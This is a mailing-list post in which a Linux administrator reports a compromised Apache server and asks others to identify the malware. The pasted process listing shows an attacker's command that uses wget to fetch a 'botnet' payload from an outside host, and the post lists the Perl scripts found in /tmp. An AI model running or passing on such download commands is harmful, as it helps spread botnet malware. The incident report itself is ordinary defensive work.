I found that something was sucking up all my bandwidth late this morning. ps -aux showed this:
apache 3267 0.0 0.0 2560 1024 ? S 11:14 0:00 sh -c wget leblocks.sytes.net/botnet | grep abcdeee 2>&1 3>&1 apache 3268 0.0 0.1 3060 1460 ? S 11:14 0:00 wget leblocks.sytes.net/botnet apache 3269 0.0 0.0 1416 448 ? S 11:14 0:00 grep abcdeee After killing all processes owned by apache and doing a bit of checking around, I found these perl scripts in /tmp/.images: -rw-r--r-- 1 apache apache 20281 Feb 15 12:13 botnet -rw-r--r-- 1 apache apache 9592 Oct 12 23:23 pv -rw-r--r-- 1 apache apache 9592 Oct 12 23:23 pv.1 They are definitely malicious. Does anyone know what this malware is? -- Rod _______________________________________________ vox-tech mailing list vox-tech@lists.lugod.org http://lists.lugod.org/mailman/listinfo/vox-tech